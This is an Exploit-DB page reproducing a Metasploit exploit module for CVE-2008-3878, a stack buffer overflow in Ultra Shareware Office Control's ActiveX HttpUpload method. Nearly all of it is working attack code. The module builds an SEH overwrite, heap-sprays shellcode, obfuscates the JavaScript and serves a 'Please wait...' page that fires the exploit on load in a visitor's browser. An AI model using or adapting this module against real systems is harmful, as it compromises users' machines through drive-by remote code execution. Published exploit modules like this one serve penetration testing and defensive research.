Ultra Shareware Office Control – ActiveX HttpUpload Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2010-09-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/16513/
  • ##
    # $Id: ultraoffice_httpupload.rb 10394 2010-09-20 08:06:27Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = GoodRanking
    
    	include Msf::Exploit::Remote::HttpServer::HTML
    	include Msf::Exploit::Remote::Seh
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow',
    			'Description'=> %q{
    					This module exploits a stack-based buffer overflow in Ultra Shareware's Office
    				Control. When processing the 'HttpUpload' method, the arguments are concatenated
    				together to form a command line to run a bundled version of cURL. If the command
    				fails to run, a stack-based buffer overflow occurs when building the error
    				message. This is due to the use of sprintf() without proper bounds checking.
    
    				NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload
    				into memory unmodified.
    			},
    			'License'=> MSF_LICENSE,
    			'Author' => [ 'shinnai', 'jduck' ],
    			'Version'=> '$Revision: 10394 $',
    			'References' =>
    				[
    					[ 'CVE', '2008-3878' ],
    					[ 'OSVDB', '47866' ],
    					[ 'BID', '30861' ],
    					[ 'URL', 'http://www.exploit-db.com/exploits/6318' ]
    				],
    			'Payload'=>
    				{
    					'Space'=> 4096,
    					'BadChars' => "\x00",
    					# For HttpUpload args: "\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f",
    					'DisableNops' => true
    				},
    			'Platform' => 'win',
    			'Targets'=>
    				[
    					# Tested with ActiveX v2.0.0.1020 and v2.0.2008.801
    					[ 'Windows Universal',
    						{
    							'Ret' => 0x0c0c0c0c# heap sprayed
    							# 0x746C15A9 # p/p/r in msls31.dll
    							# EEK, Safe SEH! 0x220118c2# p/p/r in OfficeCtrl.ocx
    						}
    					],
    				],
    			'DefaultTarget'=> 0,
    			'DisclosureDate' => 'Aug 27 2008'))
    	end
    
    	def autofilter
    		false
    	end
    
    	def check_dependencies
    		use_zlib
    	end
    
    	def on_request_uri(cli, request)
    
    		# ActiveX parameters
    		progid = "Ultra.OfficeControl"
    		clsid = "00989888-BB72-4E31-A7C6-5F819C24D2F7"
    
    		# Set parameters
    		fnname = rand_text_alpha(8+rand(8))
    		arg1 = rand_text_alphanumeric(128)
    		arg2 = rand_text_alphanumeric(4096) * 10
    		seh_offset = 252
    
    		# Build the exploit buffer
    		sploit = rand_text_alphanumeric(seh_offset)
    		sploit << generate_seh_record(target.ret)
    
    		# Encode variables
    		sploit = Rex::Text.to_hex(sploit, '%')
    		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    
    		# Prepare the heap spray parameters
    		spray_addr = target.ret
    		spray_num = "0x%x" % spray_addr
    
    		# Generate the final javascript
    		js = %Q|
    function #{fnname}()
    {
    try {
    var obj = new ActiveXObject("#{progid}");
    var my_unescape = unescape;
    var shellcode = '#{shellcode}';
    #{js_heap_spray}
    sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);
    var arg1 = my_unescape("#{arg1}");
    var arg2 = my_unescape("#{arg2}");
    var sploit = my_unescape("#{sploit}");
    obj.HttpUpload(arg1, arg2, sploit);
    } catch( e ) { window.location = 'about:blank' ; }
    }
    |
    
    		# Obfuscate the javascript
    		opts = {
    			'Strings' => true,
    			'Symbols' => {
    				'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }
    			}
    		}
    		js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
    		js.obfuscate()
    
    		# Build the final HTML
    		content = %Q|<html>
    <head>
    <script language=javascript>
    #{js}
    </script>
    </head>
    <body onload="#{fnname}()">
    Please wait...
    </body>
    </html>
    |
    
    		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
    
    		send_response_html(cli, content)
    
    		handler(cli)
    
    	end
    
    end